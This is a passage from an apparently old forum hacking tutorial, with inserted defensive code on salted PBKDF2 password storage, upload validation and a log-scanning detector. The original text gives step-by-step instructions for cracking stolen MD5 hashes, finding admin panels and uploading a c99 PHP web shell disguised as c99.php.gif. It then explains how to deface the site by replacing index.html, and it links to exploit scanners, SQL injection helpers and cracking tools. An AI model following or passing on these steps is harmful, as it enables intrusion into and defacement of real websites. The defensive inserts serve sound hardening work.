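        query = " ".join(unquote_plus(target.split("?", 1)[1]).lower().split())
        for name, rx in RULES.items():
            if rx.search(query):
                hits[ip].add(name)
    return {ip: sorted(names) for ip, names in hits.items()}
```

Several different rules firing for one client within a few minutes is a far stronger signal than any single match.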

** If you are too lazy to do the above stuff, you can use tools that will do the whole job:


1) Exploit scanner (this will find vulnerable websites)
Code:
http://rapidshare.com/files/24802790...oitscanner.zip

2) SQLi helper (this tool will do all the injecting job and get you the pass or hash)
Code:
http://rapidshare.com/files/24802907...elperV.2.7.rar

*** Use the tools only if you are new to hacking. Do it manually; that's the thrill and that is real hacking. When you do it manually you will understand the concept.

On some websites you can directly see the password, but most websites store it as an MD5 hash, so you have to crack the hash to get the password.



To crack the password there are three ways
1) Check the net whether this hash is cracked before:
Download:
http://www.md5decrypter.co.uk

2) Crack the password with the help of a site:
Download:
http://www.milw0rm.com/cracker/insert.php

http://passcracking.com/index.php

3) Use a MD5 cracking software:
Download:
http://rapidshare.com/files/13696796...CF_2.10_2b.rar

Password = OwlsNest
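
Hash lookup sites work because unsalted MD5 maps each password to one fixed value. The added example below (not part of the original post) contrasts that with a salted PBKDF2 record and shows a legacy MD5 row being upgraded at login; the record format, function names and iteration count are assumptions.

```python
import hashlib
import hmac
import secrets

ITERATIONS = 600_000  # assumed work factor for PBKDF2-HMAC-SHA256

def md5_record(password):
    # What the sites described above store: the same password always gives
    # the same 32 hex characters, on every site and for every user.
    return hashlib.md5(password.encode()).hexdigest()

def kdf_record(password):
    # A per-user random salt plus a deliberately slow key-derivation
    # function, so one precomputed table no longer fits every row.
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"

def verify(password, record):
    scheme, iterations, salt_hex, digest_hex = record.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    # Constant-time comparison of the computed and stored digests.
    return hmac.compare_digest(digest.hex(), digest_hex)

def upgrade_on_login(password, stored_md5):
    """Replace a legacy MD5 row once the user logs in with the right password."""
    if hmac.compare_digest(md5_record(password), stored_md5):
        return kdf_record(password)
    return None
```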


2) DEFACING THE WEBSITE

After getting the password you can log in as the admin of the site. But first you have to find the admin login page for the site. There are three methods to find the admin panel.


1) You can use an admin finder website:
Code:
http://4dm1n.houbysoft.com/

2) You can use an admin finder software:


Code:

http://4dm1n.houbysoft.com/
http://rapidshare.com/files/248020485/adminfinder.rar


After logging in as the admin you can upload photos to the site. So now you are going to upload a shell to the site using this upload facility.

Download the shell here:
http://rapidshare.com/files/248023722/c99.rar

Extract it and you will get c99.php; upload it.
Some sites won't allow you to upload a PHP file, so rename it to c99.php.gif
Then upload it.

After that go to
http://www.site.com/images (in most sites images are saved in this dir, but if you can't find c99 there then you have to guess the dir)

Find the c99.php.gif and click it.


Now you can see a big control panel....
Now you can do whatever you want to do...
Search for the index.html file and replace it with your own file.

So if anyone goes to that site they will see your page....
After doing this, click on Logout and you are done.
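
The c99.php.gif rename above only gets through when the upload handler trusts the file name the client sends. The added example below (not part of the original post) is an upload check that derives the stored name from the file's content instead; the function names, the extension deny-list and the size limit are assumptions.

```python
import os
import secrets

# Leading "magic" bytes of the image formats this upload endpoint accepts.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
SCRIPT_PARTS = {"php", "php5", "phtml", "asp", "aspx", "jsp", "cgi"}

class RejectedUpload(Exception):
    pass

def sniff_extension(data):
    """Return the extension implied by the file's content, or None."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None

def stored_name(client_name, data, max_bytes=2 * 1024 * 1024):
    """Choose the on-disk name for an upload, or raise RejectedUpload."""
    if len(data) > max_bytes:
        raise RejectedUpload("file too large")
    ext = sniff_extension(data)
    if ext is None:
        raise RejectedUpload("content is not an accepted image type")
    # Every dot-separated part counts, not only the last one: a server that
    # maps handlers per extension can still treat "c99.php.gif" as PHP.
    parts = os.path.basename(client_name).lower().split(".")[1:]
    if any(p in SCRIPT_PARTS for p in parts):
        raise RejectedUpload("script extension in file name")
    # The client-supplied name is never used on disk. A random name plus the
    # sniffed extension leaves nothing client-chosen in the path.
    return secrets.token_hex(16) + ext
```

A file can start with valid GIF bytes and still contain PHP, so the upload directory should also be served with script execution disabled.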

